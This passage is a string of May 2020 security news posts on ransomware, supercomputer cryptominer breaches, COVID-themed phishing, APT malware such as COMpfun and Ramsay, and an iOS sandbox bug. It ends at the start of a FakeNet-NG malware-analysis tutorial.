“The latter is a fairly common technique among ransomware operators. This kind of access is usually bought from a third party but may be obtained by group members as well.”

In March, threat actors behind PwndLocker changed the name of their malware to ProLock, immediately after security firm Emsisoft released a free decryptor tool.

According to the popular investigator Brian Krebs, the systems at Diebold Nixdorf were recently infected by the ProLock ransomware (aka PwndLocker), the same piece of ransomware involved in the attack against Lasalle County, Ill. in March.

“Fabian Wosar, Emsisoft’s chief technology officer, said if Diebold’s claims about not paying their assailants are true, it’s probably for the best: That’s because current versions of ProLock’s decryptor tool will corrupt larger files such as database files.” reads the analysis published by Krebs.

“As luck would have it, Emsisoft does offer a tool that fixes the decryptor so that it properly recovers files held hostage by ProLock, but it only works for victims who have already paid a ransom to the crooks behind ProLock.

“We do have a tool that fixes a bug in the decryptor, but it doesn’t work unless you have the decryption keys from the ransomware authors,” Wosar said.”

Pierluigi Paganini

(SecurityAffairs – ProLock, hacking)

The post FBI warns US organizations of ProLock ransomware decryptor not working appeared first on Security Affairs.

Experts reported the hack of several supercomputers across Europe

Organizations managing supercomputers across Europe reported their systems have been compromised to deploy cryptocurrency miners.

Crooks have compromised supercomputers across Europe to deploy cryptocurrency miners, incidents have been already reported in the UK, Germany, and Switzerland. Rumors are circulating about a similar infection of a supercomputer located in Spain.

The supercomputers have shut down to investigate the security breaches.

On Monday, the German bwHPC organization announced that five of its supercomputers had to be shut down due to a cryptominer infection.

Below the message published by the organization:

“Dear users, due to an IT security incident the state-wide HPC systems

  • bwUniCluster 2.0,
  • ForHLR II,
  • bwForCluster JUSTUS,
  • bwForCluster BinAC, and
  • Hawk”

Another system that was reportedly infected early last week, is the ARCHER supercomputer at the University of Edinburgh.

“Due to a security exploitation on the ARCHER login nodes, the decision has been taken to disable access to ARCHER while further investigations take place.” reads the status page for the system.

“As you may be aware, the ARCHER incident is part of a much broader issue involving many other sites in the UK and internationally. We are continuing to work with the National Cyber Security Centre (NCSC) and Cray/HPE and further diagnostic scans are taking place on the system.”

The organization reset SSH passwords in response to the incident.

On Wednesday another supercomputer was compromised the system was located in Barcelona, Spain and the infection was reported by security researcher Felix von Leitner.

“More incidents surfaced the next day, on Thursday. The first one came from the Leibniz Computing Center (LRZ), an institute under the Bavarian Academy of Sciences, which said it was disconnected a computing cluster from the internet following a security breach.” reported ZDNet.

“The LRZ announcement was followed later in the day by another from the Julich Research Center in the town of Julich, Germany. Officials said they had to shut down the JURECA, JUDAC, and JUWELS supercomputers following an “IT security incident.”

Other similar incidents made the headlines, on Saturday a high-performance computing cluster at the Faculty of Physics at the Ludwig-Maximilians University in Munich, Germany was infected with a malware.

The Swiss Center of Scientific Computations (CSCS) in Zurich, Switzerland also reported a cyber incident and it shut down any external access to its infrastructure in response to the security breach.

“CSCS detected malicious activity in relation to these attacks. Due to this situation, the external access to the centre has been closed until having restored a safe environment. The users were informed immediately and are kept up to date. Not affected are the weather forecasts of MeteoSwiss, which are also calculated at CSCS.” reads the security advisory.

“We are currently investigating the illegal access to the centre. Our engineers are actively working on bringing back the systems as soon as possible to reduce the impact on our users to a minimum” says CSCS-Director Thomas Schulthess.”

Today, the Computer Security Incident Response Team (CSIRT) for the European Grid Infrastructure has released technical details of a malware involved in these incidents.

Researchers from security firm Cado Security also released Indicators of Compromise (IoCs).

ZDNet, citing the opinion of a security researcher, speculates that threat actors have exploited the CVE-2019-15666 vulnerability to gain root access to the supercomputers then deploy a Monero (XMR) cryptocurrency miner.

Other experts speculate that the supercomputers were hacked by nation-state actors because they were involved in the research on the COVID-19 outbreak.

Pierluigi Paganini

(SecurityAffairs – supercomputers, hacking)

The post Experts reported the hack of several supercomputers across Europe appeared first on Security Affairs.

Coronavirus-themed attacks May 10 – May 16, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 10 to May 16, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide, experts are observing new campaigns on a daily bases.

Below a list of attacks detected this week.

May 12 – Zeus Sphinx continues to be used in COVID-19-themed attacks

The Zeus Sphinx banking Trojan continues to evolve while receiving new updates it is employed in ongoing coronavirus-themed scams. 

May 13 – Crooks continues to use COVID-19 lures, Microsoft warns

Microsoft discovered a new phishing campaign using COVID-19 lures to target businesses with the infamous LokiBot information-stealer.

May 14 – China-linked hackers are attempting to steal COVID-19 Vaccine Research

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal COVID-19 vaccine research.

May 16 – Microsoft is open-sourcing COVID-19 threat intelligence

Microsoft has recently announced that it has made some of its COVID-19 threat intelligence open-source. 

May 16 – QNodeService Trojan spreads via fake COVID-19 tax relief

Experts spotted a new malware dubbed QNodeService that was involved in COVID-19-themed phishing campaign, crooks promise victims COVID-19 tax relief.

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Coronavirus-themed attacks May 10 – May 16, 2020 appeared first on Security Affairs.

Security Affairs newsletter Round 264

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

Blue Mockingbird Monero-Mining campaign targets web apps
Shiny Hunters group is selling data from 11 companies on the Dark Web
Swiss rail vehicle manufacturer Stadler hit by a malware-based attack
ATM vendor Diebold Nixdorf suffered a Ransomware attack
Experts disclose security flaws in Oracles iPlanet Web Server
GDPR Data Security Checklist in the Age of COVID-19 and the Remote Workforce
Sodinokibi ransomware uses MS API to encrypt open and locked files
STAMINA, a new approach to malware detection by Microsoft, Intel
VMware is going to fix recent Salt issues in vROps
A cyber attack hit a port on Strait of Hormuz, Iran said
Adobe addresses critical issues in Acrobat, Reader, and DNG SDK
Patch now your vBulletin install before hacker will target your forum
Popular Page Builder WordPress plugin fixes critical issues. Update it now!
Trojan Lampion is back after 3 months
Zeus Sphinx continues to be used in Coronavirus-themed attacks
Chancellor Merkel has ‘hard evidence of Russian hackers targeted her
Crooks continues to use COVID-19 lures, Microsoft warns
Expert found 1,236 websites infected with Magecart e-skimmer
Healthcare giant Magellan Health discloses data breach after ransomware attack
Microsoft May 2020 Patch Tuesday fixes 111 flaws, 13 Critical
USCYBERCOM shares five new North Korea-linked malware samples
China-linked hackers are attempting to steal COVID-19 Vaccine Research
Crooks stole $10 million from Norways state investment fund Norfund
Google WordPress Site Kit plugin grants attacker Search Console Access
New Ramsay malware allows exfiltrating files from air-gapped computers
Zerodium will no longer acquire certain types of iOS exploits due to surplus
Chinese APT Tropic Trooper target air-gapped military Networks in Asia
Interserve UK defense contractor hacked, up to 100,000 past and present employees details exposed
Palo Alto Networks addresses tens of serious issues in PAN-OS
Russian APT Turlas COMpfun malware uses HTTP status codes to receive commands
Threat actors are offering for sale 550 million stolen user records
APT group targets high profile networks in Central Asia
Microsoft is open-sourcing COVID-19 threat intelligence
QNodeService Trojan spreads via fake COVID-19 tax relief

Pierluigi Paganini

(SecurityAffairs – newsletter, hacking)

The post Security Affairs newsletter Round 264 appeared first on Security Affairs.

APT group targets high profile networks in Central Asia

Security firms have foiled an advanced cyber espionage campaign carried out by Chinese APT and aimed at infiltrating a governmental institution and two companies.

Antivirus firms have uncovered and foiled an advanced cyber espionage campaign aimed at a governmental institution and two companies in the telecommunications and gas sector.

The level of sophistication of the attack and the nature of targets suggests the involvement of an advanced persisten threat, likely from China, focused on cyber espionage activity in Central Asia.

Attackers used multiple commodity malware and previously unknown backdoors in the attacks, the analysis of their code suggests a possible link with multiple campaigns uncovered over several years.

Most of the C2 used by the attackers are hosted by the provider Choopa, LLC, and threat actors made large use of Gh0st RAT, a malware attributed to China-linked cyber espionage groups.

The security firm ESET and Avast first detected the attacks since September and January respectively. The researchers identified a host used as a repository containing hacking tools and backdoors, whose code has many similarities with malware previously associated with China-linked APT groups.

“The samples we analyzed contain links to malware samples and campaigns, such as MicrocinBYEBY, and Vicious Panda, previously described by Kaspersky, Palo Alto Networks, and Check Point, respectively. The backdoors we found are custom tools that have not previously been analyzed, as far as we know.” reads a report published by Avast. “The majority of the C&C servers are registered to Choopa, LLC, a hosting platform that has been used by cybercriminals in the past.”

Below a timeline of the attacks that appeared to be associated with the same threat actor.

Avast APT Timeline_May-2020

“An APT group, which we believe could possibly be from China, planted backdoors to gain long-term access to corporate networks. Based on our analysis, we suspect the group was also behind attacks active in Mongolia, Russia, and Belarus.” continues Avast.

Researchers from ESET that investigared into the attacks discovered three backdoors that collectively tracked as Mikroceen. The backdoors allowed the threat actors to manage the target file system, establish a remote shell, take screenshots, manage services and processes, and run console commands.

Below the list of backdoors published by ESET:

  • sqllauncher.dll (VMProtected backdoor)
  • logon.dll (VMProtected backdoor)
  • logsupport.dll (VMProtected backdoor)

Both “sqllauncher.dll” and “logon.dll” run as services and use the same C2 infrastructure, experts noticed that all of them feature protection against reverse engineering. Two of them, “sqllauncher.dll” and “logon.dll,” run as services and use the same C2 server.

Attackers use a version of the Mimikatz post-exploitation tool and rely on Windows Management Instrumentation (WMI) for lateral movement.

“Avast reported its findings to the local CERT team and reached out to the telecommunications company. We have not heard back from either organization.” concluded Avast.

“Avast has recently protected users in Central Asia from further attacks using the samples we analyzed.”

Both Avast and ESET have published a list of indicators of compromise (IoC) for the above threats.

Pierluigi Paganini

(SecurityAffairs – Microcin malware, hacking)

The post APT group targets high profile networks in Central Asia appeared first on Security Affairs.

Microsoft is open-sourcing COVID-19 threat intelligence

Microsoft has recently announced that it has made some of its COVID-19 threat intelligence open-source. 

While the number of Coronavirus-themed attacks continues to increase increased Microsoft announced it is open-sourcing its COVID-19 threat intelligence to help organizations to repeal these threats.

“Microsoft processes trillions of signals each day across identities, endpoint, cloud, applications, and email, which provides visibility into a broad range of COVID-19-themed attacks, allowing us to detect, protect, and respond to them across our entire security stack.” reads a post published by Microsoft. “Today, we take our COVID-19 threat intelligence sharing a step further by making some of our own indicators available publicly for those that are not already protected by our solutions. “

Sharing information could offer the community a more complete view of attackers’ tactics, techniques, and procedures.

Microsoft experts have already been sharing examples of malicious lures and have provided guided hunting of COVID-themed attacks through Azure Sentinel Notebooks.

COVID malspam

Microsoft is going to publicly release some of its threat indicators, the company pointed out that its users are already protected against these attacks by Microsoft Threat Protection (MTP).

Microsoft has made available the indicators both in the Azure Sentinel GitHub repo, and through the Microsoft Graph Security API.

“These indicators are now available in two ways. They are available in the Azure Sentinel GitHub and through the Microsoft Graph Security API. For enterprise customers who use MISP for storing and sharing threat intelligence, these indicators can easily be consumed via a MISP feed.” continues Microsoft.

“This threat intelligence is provided for use by the wider security community, as well as customers who would like to perform additional hunting, as we all defend against malicious actors seeking to exploit the COVID crisis.”

This is just the beginning of the threat intelligence sharing of Coronavirus-related IOCs that will be offered through the peak of the outbreak.

Microsoft is releasing file hash indicators related to malicious email attachments employed in the campaigns. 

Azure Sentinel customers can import the indicators using a Playbook or access them directly from queries. Microsoft added that both Office 365 ATP and Microsoft Defender ATP already block the attacks associated with the above indicators.

Pierluigi Paganini

(SecurityAffairs – Coronavirus, hacking)

The post Microsoft is open-sourcing COVID-19 threat intelligence appeared first on Security Affairs.

QNodeService Trojan spreads via fake COVID-19 tax relief

Experts spotted a new malware dubbed QNodeService that was involved in Coronavirus-themed phishing campaign, crooks promise victims COVID-19 tax relief.

Researchers uncovered a new malware dubbed QNodeService that was employed in a Coronavirus-themed phishing campaign. The operators behind the campaign use COVID-19 lure promising victims tax relief.

The phishing messages use Trojan sample associated with a file named “Company PLP_Tax relief due to Covid-19 outbreak CI+PL.jar,” experts from MalwareHunterTeam noticed that the malicious code was only detected by ESET AV.

The QNodeService Trojan is written in Node.js and is delivered through a Java downloader embedded in the .jar file, Trend Micro warns. 

“Running this file led to the download of a new, undetected malware sample written in Node.js; this trojan is dubbed as “QNodeService”.” reads the analysis published by Trend Micro.

“The use of Node.js is an unusual choice for malware authors writing commodity malware, as it is primarily designed for web server development, and would not be pre-installed on machines likely to be targeted. However, the use of an uncommon platform may have helped evade detection by antivirus software.”

QNodeService is able to perform a broad range of activities, such as download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management. The malware can also steal system information including IP address and location, download additional malware payloads, and exfiltrate stolen data. The actual malware only targets Windows systems, but experts believe that developers are working to make it a cross-platform threat.

The Java downloader is obfuscated via Allatori in the bait document, the malware downloads the Node.js malware file (either “qnodejs-win32-ia32.js” or “qnodejs-win32-x64.js”) and a file called “wizard.js.” 

Either a 32-bit or 64-bit version of Node.js is dropped depending on the Windows system architecture of the target machine. 

The wizard.js file is an obfuscated Javascript (Node.js) file used to acheve persistence by creating a “Run” registry key entry and for downloading another malicious payload.

One of the most interesting feature implemented by the QNodeService malware is the support for an “http-forward” command, which allows attackers to download files without directly connecting to a victim’s PC. 

“Of particular note is the http-forward command, which allows an attacker to download a file without directly connecting to the victim machine, as shown below in figures 13-16.” continues Trend Micro. “However, a valid request path and access token are required to access files on the machine. The C&C server must first send “file-manager/forward-access” to generate the URL and access token to use for the http-forward command later.”

Trend Micro researchers included Indicators of Compromise (IoCs) in their report.

Unfortunately, Coronavirus-themed attacks continue to target individuals, businesses, and organizations worldwide.

At the end of March, experts from IBM X-Force uncovered a hacking campaign employing the Zeus Sphinx malware that focused on government relief payment.

Operators were spreading it in a spam campaign aimed at stealing victims’ financial information, the spam messages sent to the victims claim to provide information related to the Coronavirus outbreak and government relief payments

Researchers revealed that the malware is receiving constant upgrades to improve its capabilities. 

Pierluigi Paganini

(SecurityAffairs – Coronavirus, hacking)

The post QNodeService Trojan spreads via fake COVID-19 tax relief appeared first on Security Affairs.

Threat Roundup for May 8 to May 15

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between May 8 and May 15. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center,, or

Read More



20200515-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for May 8 to May 15 appeared first on Cisco Blogs.

Russian APT Turla’s COMpfun malware uses HTTP status codes to receive commands

Russia-linked cyberespionage group Turla targets diplomatic entities in Europe with a new piece of malware tracked as COMpfun.

Security experts from Kaspersky Lab have uncovered a new cyberespionage campaign carried out by Russia-linked APT Turla that employs a new version of the COMpfun malware. The new malware allows attackers to control infected hosts using a technique that relies on HTTP status codes.

COMpfun was first spotted in the wild in 2014 by G DATA researchers, Kaspersky first observed the threat in autumn 2019 when it was employed in attacks against diplomatic entities across Europe.

“You may remember that in autumn 2019 we published a story about how a COMpfun successor known as Reductor infected files on the fly to compromise TLS traffic.” reads the analysis published by Kaspersky. “The campaign operators retained their focus on diplomatic entities, this time in Europe, and spread the initial dropper as a spoofed visa application.”

The Turla APT group (aka SnakeUroburosWaterbugVenomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

In March the APT group employed two new pieces of malware in watering hole attacks targeting several high-profile Armenian websites.

The COMpfun malware analyzed by Kaspersky implements a new technique to receive commands from the C2 as HTTP status codes.

COMpfun is a remote access trojan (RAT) that could collect system data, logs keystrokes, and takes screenshots.

Turla compfun

The new variant of the COMpfun malware includes two new features, the ability to monitor when USB removable devices plugged into or unplugged from the host, and the mentioned C2 communication technique.

The first feature was implemented to allow the malware propagating itself to the connected device.

The second feature was implemented to avoid detection, Turla vxers implemented new C2 protocol that relies on HTTP status codes.

HTTP status codes provide a state of the server and instruct clients on action to do (i.e. drop the connection), COMpfun exploited this mechanism to control the bot running on the compromised systems.

“We observed an interesting C2 communication protocol utilizing rare HTTP/HTTPS status codes (check IETF RFC 7231, 6585, 4918). Several HTTP status codes (422-429) from the Client Error class let the Trojan know what the operators want to do. After the control server sends the status “Payment Required” (402), all these previously received commands are executed.” continues the analysis.

For example, if the COMpfun server would respond with a 402 status code, followed by a 200 status code, the malicious code sends collected target data to C2 with the current tickcount.

Below the list of commands associated with common HTTP status codes:

HTTP statusRFC status meaningCorresponding command functionality
200OKSend collected target data to C2 with current tickcount
402Payment RequiredThis status is the signal to process received (and stored in binary flag) HTTP statuses as commands
422Unprocessable Entity (WebDAV)Uninstall. Delete COM-hijacking persistence and corresponding files on disk
423Locked (WebDAV)Install. Create COM-hijacking persistence and drop corresponding files to disk
424Failed Dependency (WebDAV)Fingerprint target. Send host, network and geolocation data
427Undefined HTTP statusGet new command into IEA94E3.tmp file in %TEMP%, decrypt and execute appended command
428Precondition RequiredPropagate self to USB devices on target
429Too Many RequestsEnumerate network resources on target

“The malware operators retained their focus on diplomatic entities and the choice of a visa-related application – stored on a directory shared within the local network – as the initial infection vector worked in their favor. The combination of a tailored approach to their targets and the ability to generate and execute their ideas certainly makes the developers behind COMPFun a strong offensive team.” concludes Kaspersky.

Pierluigi Paganini

(SecurityAffairs – Turla, malware)

The post Russian APT Turla’s COMpfun malware uses HTTP status codes to receive commands appeared first on Security Affairs.

New software enables existing sensors to detect ransomware

Engineers from SMU’s Darwin Deason Institute for Cybersecurity have developed software to detect ransomware attacks before attackers can inflict catastrophic damage. Ransomware is crippling cities and businesses all over the world, and the number of ransomware attacks have increased since the start of the coronavirus pandemic. Attackers are also threatening to publicly release sensitive data if ransom isn’t paid. The FBI estimates that ransomware victims have paid hackers more than $140 million in the last … More

The post New software enables existing sensors to detect ransomware appeared first on Help Net Security.

Businesses vulnerable to emerging risks have a gap in their insurance coverage

The majority of business decision makers are insured against traditional cyber risks, such as breaches of personal information, but most were vulnerable to emerging risks, such as malware and ransomware, revealing a potential insurance coverage gap, according to the Hanover Insurance Group. The report surveyed business decision makers about cyber vulnerabilities and risk mitigation efforts. Insurance purchasing decisions influenced by media coverage Most businesses surveyed indicated they had purchased cyber insurance, and more than 70% … More

The post Businesses vulnerable to emerging risks have a gap in their insurance coverage appeared first on Help Net Security.

US Government Exposes North Korean Malware

US Cyber Command has uploaded North Korean malware samples to the VirusTotal aggregation repository, adding to the malware samples it uploaded in February.

The first of the new malware variants, COPPERHEDGE, is described as a Remote Access Tool (RAT) "used by advanced persistent threat (APT) cyber actors in the targeting of cryptocurrency exchanges and related entities."

This RAT is known for its capability to help the threat actors perform system reconnaissance, run arbitrary commands on compromised systems, and exfiltrate stolen data.

TAINTEDSCRIBE is a trojan that acts as a full-featured beaconing implant with command modules and designed to disguise as Microsoft's Narrator.

The trojan "downloads its command execution module from a command and control (C2) server and then has the capability to download, upload, delete, and execute files; enable Windows CLI access; create and terminate processes; and perform target system enumeration."

Last but not least, PEBBLEDASH is yet another North Korean trojan acting like a full-featured beaconing implant and used by North Korean-backed hacking groups "to download, upload, delete, and execute files; enable Windows CLI access; create and terminate processes; and perform target system enumeration."

It's interesting to see the US government take a more aggressive stance on foreign malware. Making samples public, so all the antivirus companies can add them to their scanning systems, is a big deal -- and probably required some complicated declassification maneuvering.

Me, I like reading the codenames.

Lots more on the US-CERT website.

New Ramsay malware allows exfiltrating files from air-gapped computers

Experts discovered a new strain of malware dubbed Ramsay that can infect air-gapped computers and steal sensitive data, including Word, PDF, and ZIP files.

Researchers from security firm ESET discovered a new advanced malware framework named Ramsay that appears to have been designed to infect air-gapped computers and exfiltrate sensitive data.

The malicious code collects sensitive files, including Word, PDF, and ZIP files, in a hidden storage folder, then waits for the opportunity to exfiltrate them.

“ESET researchers have discovered a previously unreported cyber-espionage framework that we named Ramsay and that is tailored for collection and exfiltration of sensitive documents and is capable of operating within air‑gapped networks.” reads the report published by ESET.

The malware was specifically designed to jump the air gap and reach computers withing the isolated networks to steal sensitive information.

The researchers found a sample of the Ramsay after it was uploaded to VirusTotal from Japan, then they discovered further components and versions of the framework, a circumstance that suggest the framework is still under active developmental stage.

Experts speculate that at least three variants of the malware exist, tracked as v1, v2.a, and v2.b. Ramsay v1 was first compiled in September 2019, and is also the least complex.

The v2.a and v2.b samples have been compiled on March 8 and March 27, respectively, both include a rootkit component, but experts noticed that only 2.a implements spreading capabilities.

Experts report that the less complex versions of the malware are dropped by weaponized documents exploiting CVE-2017-0199 and CVE-2017-11882, RCE vulnerabilities.

The Ramsay v2.a is delivered using a fake installer for the 7-zip file compression utility.


Ramsay allows attackers to collect all Microsoft Word documents on the target computer, most recent variants are also able to exfiltrate PDF files and ZIP‌ archives on network drives and removable drives.

ESET researchers were not able to identify any Ramsay exfiltration module used by the malicious code.

ESET did not attribute the Ramsay malware to a specific threat actor, researchers only notice some similarities with the Retro malware family employed by the DarkHotel APT group.

“Based on the different instances of the framework found Ramsay has gone through various development stages, denoting an increasing progression in the number and complexity of its capabilities. Developers in charge of attack vectors seem to be trying various approaches such as old exploits for Word vulnerabilities from 2017 as well as deploying trojanized applications.” concludes ESET.

“We interpret this as that developers have a prior understanding of the victims’ environment and are tailoring attack vectors that would successfully intrude into targeted systems without the need to waste unnecessary resources.”

Pierluigi Paganini

(SecurityAffairs – Ramsay malware, hacking)

The post New Ramsay malware allows exfiltrating files from air-gapped computers appeared first on Security Affairs.

Crooks continues to use COVID-19 lures, Microsoft warns

Microsoft discovered a new phishing campaign using COVID-19 lures to target businesses with the infamous LokiBot information-stealer.

Microsoft has discovered a new COVID-19 themed phishing campaign targeting businesses with the LokiBot Trojan.

Lokibot was already employed in Coronavirus-themed campaigns, early of April, security experts at FortiGuard Labs discovered phishing attacks using alleged messages from the World Health Organization (WHO) to deliver the LokiBot trojan.

COVID-19 themed phishing campaigns recently observed by Microsoft was using messages with subject lines like “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020.”

The LokiBot data stealer is able to collect information from tens of different web browsers, access to browsing data, locate the credentials for more than 15 different email and file transfer clients, and check for the presence of popular remote admin tools like SSH, VNC and RDP.

One of the phishing campaigns observed by Microsoft sees attackers pretending to be from the Centers for Disease Control (CDC), the messages promise latest information on the COVID-19 pandemic and a new “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020”.

Another campaign use messages that pretend to be from a vendor asking for updated banking information to process payments due to the COVID-19 virus lockdown.

The emails in both campaigns use ARJ attachments that contain malicious executables disguised as PDF files.

The choice of password-protected ARJ files aims at bypassing some security solutions. Upon opening the enclosed files, the infection process will start to finally deliver the LokiBot Trojan.

Microsoft pointed out that its Microsoft Threat Protection’s machine learning algorithms were able to detect the campaign, Microsoft users are automatically protected by the Microsoft Defender.

“Microsoft Defender’s advanced detection technologies, including behavior learning and machine learning, started blocking this attack right away. We used deeper analysis of the blocked attacks, which helped us to identify the end-to-end campaign detailed,” Tanmay Ganacharya, director of security research of Microsoft Threat Protection, told BleepingComputer.

“We see a lot of benefits of leveraging machine learning and we are in a very unique position here at Microsoft because of the quality and diversity of our 8.2 trillion signals we process daily through the Microsoft Intelligent Security Graph.” 

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Crooks continues to use COVID-19 lures, Microsoft warns appeared first on Security Affairs.

Threat Roundup for May 1 to May 8

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Apr 24 and May 1. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center,, or

Read More



20200508-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for May 1 to May 8 appeared first on Cisco Blogs.


This is a good explanation of an iOS bug that allowed someone to break out of the application sandbox. A summary:

What a crazy bug, and Siguza's explanation is very cogent. Basically, it comes down to this:

  • XML is terrible.
  • iOS uses XML for Plists, and Plists are used everywhere in iOS (and MacOS).
  • iOS's sandboxing system depends upon three different XML parsers, which interpret slightly invalid XML input in slightly different ways.

So Siguza's exploit ­-- which granted an app full access to the entire file system, and more ­- uses malformed XML comments constructed in a way that one of iOS's XML parsers sees its declaration of entitlements one way, and another XML parser sees it another way. The XML parser used to check whether an application should be allowed to launch doesn't see the fishy entitlements because it thinks they're inside a comment. The XML parser used to determine whether an already running application has permission to do things that require entitlements sees the fishy entitlements and grants permission.

This is fixed in the new iOS release, 13.5 beta 3.


Implementing 4 different parsers is just asking for trouble, and the "fix" is of the crappiest sort, bolting on more crap to check they're doing the right thing in this single case. None of this is encouraging.

More commentary. Hacker News thread.

Smashing Security #177: Elon Musk, Roblox, and Love Bug author found

What can X Æ A-12 Musk teach us about passwords? How did our guest finally hunt down in Manila the author of one of history’s biggest virus outbreaks? And what on earth is a hacker doing breaching Roblox security?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by technology journalist Geoff White.

Malware in Google Apps

Interesting story of malware hidden in Google Apps. This particular campaign is tied to the government of Vietnam.

At a remote virtual version of its annual Security Analyst Summit, researchers from the Russian security firm Kaspersky today plan to present research about a hacking campaign they call PhantomLance, in which spies hid malware in the Play Store to target users in Vietnam, Bangladesh, Indonesia, and India. Unlike most of the shady apps found in Play Store malware, Kaspersky's researchers say, PhantomLance's hackers apparently smuggled in data-stealing apps with the aim of infecting only some hundreds of users; the spy campaign likely sent links to the malicious apps to those targets via phishing emails. "In this case, the attackers used Google Play as a trusted source," says Kaspersky researcher Alexey Firsh. "You can deliver a link to this app, and the victim will trust it because it's Google Play."


The first hints of PhantomLance's campaign focusing on Google Play came to light in July of last year. That's when Russian security firm Dr. Web found a sample of spyware in Google's app store that impersonated a downloader of graphic design software but in fact had the capability to steal contacts, call logs, and text messages from Android phones. Kaspersky's researchers found a similar spyware app, impersonating a browser cache-cleaning tool called Browser Turbo, still active in Google Play in November of that year. (Google removed both malicious apps from Google Play after they were reported.) While the espionage capabilities of those apps was fairly basic, Firsh says that they both could have expanded. "What's important is the ability to download new malicious payloads," he says. "It could extend its features significantly."

Kaspersky went on to find tens of other, similar spyware apps dating back to 2015 that Google had already removed from its Play Store, but which were still visible in archived mirrors of the app repository. Those apps appeared to have a Vietnamese focus, offering tools for finding nearby churches in Vietnam and Vietnamese-language news. In every case, Firsh says, the hackers had created a new account and even Github repositories for spoofed developers to make the apps appear legitimate and hide their tracks.

Cybercriminals Are Exploiting the Covid-19 Pandemic

Cybercriminals are actively targeting Covid-19 hotspots with malware and phishing campaigns, according to a new report from Bitdefender.

The report, “Coronavirus-themed Threat Reports Haven’t Flattened the Curve,” shows a direct correlation between confirmed Covid-19 cases and malware attacks exploiting the crisis.

These findings confirm a similar report that showed a 30000% increase in Covid-19-themed attacks from January to March.

“Countries that have reported the largest number of Coronavirus-themed [scams] seem to have also been those hit hardest by the pandemic,” the report stated, showing a concurrent increase in both confirmed cases and malware attacks in South Africa in April as an example.

Data from the Bitdefender report also indicated a connection between an increase in phishing campaigns in areas where testing for Covid-19 has become available.

“[W]e can safely infer that people who get tested are interested in learning more about potential treatments, medicine, medical best practices, and maybe even other patient’s experiences… those spending more time online looking for information about COVID-19 are more likely to fall prey to scams and malware related to Coronavirus,” the report stated. “Receiving an email claiming to have new and interesting information about the pandemic with more exclusive information embedded within the attachment is the perfect lure.”

Read the full report here.

The post Cybercriminals Are Exploiting the Covid-19 Pandemic appeared first on Adam Levin.

FakeNet Genie: Improving Dynamic Malware Analysis with Cheat Codes for FakeNet-NG

As developers of the network simulation tool FakeNet-NG, reverse engineers on the FireEye FLARE team, and malware analysis instructors, we get to see how different analysts use FakeNet-NG and the challenges they face. We have learned that FakeNet-NG provides many useful features and solutions of which our users are often unaware. In this blog post, we will showcase some cheat codes to level up your network analysis with FakeNet-NG. We will introduce custom responses and demonstrate powerful features such as executing commands on connection events and decrypting SSL traffic.

Since its first release in 2016, we have improved FakeNet-NG by adding new features such as Linux support and content-based protocol detection. We recently updated FakeNet-NG with one of our most requested features: custom responses for HTTP and binary protocols.

This blog post offers seven "stages" to help you master different FakeNet-NG strategies. We present them in terms of common scenarios we encounter when analyzing malware. Feel free to skip to the section relevant to your current analysis and/or adapt them to your individual needs. The stages are presented as follows:

  1. Custom File Responses
  2. Custom Binary Protocols
  3. Custom HTTP Responses
  4. Manual Custom Responses
  5. Blacklisting Processes
  6. Executing Commands on Connection Events
  7. Decrypting SSL Traffic

Read on to upgrade your skill tree and become a FakeNet-NG pro!

Before You Start: Configuring FakeNet-NG

Here is a quick reference for FakeNet-NG configurations and log data locations.

  1. Configuration files are in fakenet\configs. You can modify default.ini or copy it to a new file and point FakeNet-NG to the alternate configuration with -c. Ex: -c custom.ini.
  2. Default files are at fakenet\defaultFiles and Listener implementations are at fakenet\listeners.
  3. The fakenet\configs\default.ini default configuration includes global configuration settings and individual Listener configurations.
  4. Custom response configuration samples are included in the directory fakenet\configs in the files, sample_custom_response.ini, and sample_raw_response.txt.
  5. The install location for FakeNet-NG in FLARE VM is C:\Python27\lib\site-packages\fakenet. You will find the subdirectories containing the defaultFiles, configs, and listeners in this directory.
  6. In FLARE VM, FakeNet-NG packet capture files and HTTP requests can be found on the Desktop in the fakenet_logs directory

Stage 1: Custom File Responses

